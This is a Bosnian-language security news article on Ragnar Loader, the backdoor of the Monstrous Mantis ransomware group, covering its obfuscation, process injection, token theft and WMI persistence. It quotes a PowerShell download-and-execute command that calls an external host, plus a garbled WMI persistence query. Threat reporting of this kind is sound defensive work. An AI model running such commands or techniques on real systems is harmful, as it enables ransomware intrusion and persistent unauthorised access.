Sofisticirani alat za malver poznat kao Ragnar Loader identifikovan je kao kritična komponenta u ciljanim napadima ransomware-a.
Učitavač, također poznat kao Sardonic Backdoor, služi kao primarni mehanizam infiltracije za grupu Monstrous Mantis ransomware, ranije poznatu kao Ragnar Locker, koja napada organizacije od svog nastanka 2020. godine.
Istraživači sigurnosti su utvrdili da je primarna funkcija Ragnar Loadera uspostavljanje i održavanje trajnog pristupa kompromitovanim sistemima.
.webp)
Jednom implementiran, maliciozni softver omogućava hakerima da zadrže dugoročna uporišta unutar ciljanih okruženja, olakšavajući proširene maliciozne operacije.
Komplet alata koristi višeslojno prikrivanje, rutine dinamičkog dešifrovanja i sofisticirane mehanizme postojanosti koji predstavljaju značajne izazove za konvencionalnu odbranu sigurnosti.
Analiza istraživača Catalyst-a otkriva da Ragnar Loader za izvršavanje koristi terete zasnovano na PowerShell-u, uključujući snažne metode šifrovanja i kodiranja, uključujući RC4 i Base64, kako bi prikrio svoje operacije.
Maliciozni softver koristi strategije ubrizgavanja procesa kako bi uspostavio prikrivenu kontrolu nad kompromitovanim sistemima.
Tipična infekcija počinje sa PowerShell komandama kao što su: “powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString(‘https://104-238-34-209[.]nip[.]io/4c8b09’).exe koji preuzima inicijalnu i isplatnu učitavanje.
Učitavač se obično distribuiše kao dio sveobuhvatnog kompleta alata koji uključuje više komponenti: skriptu za inicijalizaciju čvora, okretne datoteke, datoteke protokola udaljene radne površine i skripte za daljinsko izvršavanje koda.
Ovi alati zajedno pružaju operaterima ransomware-a opsežne mogućnosti za bočno kretanje i upornost unutar mreža žrtava.
Tehnike izbjegavanja
Tehnička sofisticiranost malicioznog softvera je očigledna u njegovom višestepenom procesu implementacije.
.webp)
Nakon početnog izvršenja, Ragnar Loader dešifruje nizove bajtova tako što ih prvo dekompresuje, a zatim primjenjuje RC4 dešifriranje.
.webp)
Shellcode pokazuje ponašanje koje se samo-modifikuje kroz XOR procese dešifrovanja.
Da bi uspostavio postojanost, maliciozni softver kreira WMI filtere koji se pokreću u određenim vremenima rada sistema, koristeći upite kao što su “SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System AND TargetInstance.System.System>AND=Up TargetInstance.SystemUpTime < 250.”
Ova tehnika postojanosti bez datoteka pomaže da maliciozni softver ostane neotkriven na kompromitovanim sistemima.
.webp)
Učitavač ubacuje svoj korisni teret u legitimne Windows procese, posebno WmiPrvSE.exe, nakon krađe tokena iz lsass.exe da bi povećao privilegije.
Ova tehnika omogućava malicioznom softveru da radi sa proširenim pristupom sistemu dok se krije iza legitimnih procesa.
Kada se uspostavi, backdoor može primiti više komandi sa svog komandnog i kontrolnog servera, uključujući funkcije za učitavanje DLL dodataka, čitanje i pisanje datoteka, izvršavanje shellcode-a i kreiranje interaktivnih sesija.
Izvor: CyberSecurityNews